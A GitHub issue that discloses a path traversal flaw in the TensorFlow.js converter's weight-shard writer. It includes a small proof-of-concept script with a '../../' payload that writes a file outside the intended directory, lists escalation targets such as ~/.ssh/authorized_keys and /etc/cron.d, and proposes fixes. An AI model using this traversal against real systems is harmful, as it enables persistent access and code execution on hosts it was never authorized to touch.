-
Notifications
You must be signed in to change notification settings - Fork 2k
Description
Path Traversal Vulnerability in write_weights.py Allows Arbitrary File Write
System information
- Have I written custom code: Yes (minimal PoC)
- OS Platform: Windows 11 & Ubuntu 22.04
- Mobile device: N/A
- TensorFlow.js installed from: pip (tensorflowjs package)
- TensorFlow.js version: 4.20.0
- Browser version: N/A (Python-side issue)
- TensorFlow.js Converter Version: 4.20.0
Describe the current behavior
The TensorFlow.js converter (tfjs-converter pip package) contains a path traversal vulnerability inside the function _shard_group_bytes_to_disk located in:
tfjs-converter/python/tensorflowjs/write_weights.py
The vulnerable code (lines 300–306) is:
filename = 'group%d-shard%dof%d.bin' % (group_index + 1, i + 1, num_shards)
filenames.append(filename)
filepath = os.path.join(write_dir, filename)
# Write the shard to disk.
with tf.io.gfile.GFile(filepath, 'wb') as f:
f.write(shard)
os.path.join() does not prevent path traversal. If write_dir contains values such as "../../", the converter writes files outside the intended output directory.
There is no path normalization (os.path.abspath), no sanitization, and no prefix enforcement to keep writes inside the sandbox.
This results in arbitrary file write on the host filesystem.
Describe the expected behavior
The converter should ensure that shard output paths always remain inside the intended directory by:
- Normalizing output paths (
os.path.abspath/realpath) - Rejecting traversal (
.., absolute paths, symlinks) - Enforcing prefix containment (
if not resolved.startswith(write_dir): error)
Standalone code to reproduce the issue
Save this file as reproduce_tfjs_path_traversal.py:
import os
import numpy as np
if not hasattr(np, 'object'):
np.object = object
if not hasattr(np, 'bool'):
np.bool = bool
# Vulnerable logic derived from write_weights.py
def _shard_group_bytes_to_disk_VULN(write_dir, filename, data):
filepath = os.path.join(write_dir, filename)
os.makedirs(os.path.dirname(filepath), exist_ok=True)
with open(filepath, 'wb') as f:
f.write(data)
return filepath
# Safe directory
safe_zone = os.path.abspath("safe_zone")
os.makedirs(safe_zone, exist_ok=True)
# Directory traversal payload
malicious_payload = "../../PWNED_BY_TFJS.txt"
print("[*] Base directory:", safe_zone)
print("[*] Attempting path traversal...")
result = _shard_group_bytes_to_disk_VULN(
safe_zone,
malicious_payload,
b"TEST"
)
print("Final path:", os.path.abspath(result))
How to run
python reproduce_tfjs_path_traversal.py
Observed output
[*] Base directory: /path/to/safe_zone
[*] Attempting path traversal...
Final path: /path/to/PWNED_BY_TFJS.txt
This confirms file write occurred OUTSIDE the intended directory.
Explanation
The issue occurs because:
filepath = os.path.join(write_dir, filename)
Blindly trusts the input. If an attacker controls the model path or conversion directory (very common in JupyterHub, shared ML pipelines, CI/CD model converters, API upload → convert services), they can write anywhere, including:
- ~/.ssh/authorized_keys (persistent access)
- /etc/cron.d/* (code execution)
- service startup scripts
- python module override (import-time code execution)
- overwrite user files in shared environments
This is a correctness & safety bug in TensorFlow.js converter logic.
Other info / logs
- VRP team already confirmed public disclosure is permitted:
“Users are recommended to run untrusted models in a sandbox. You may disclose publicly.” - This is still an unsafe behavior for a machine learning converter that processes untrusted paths frequently.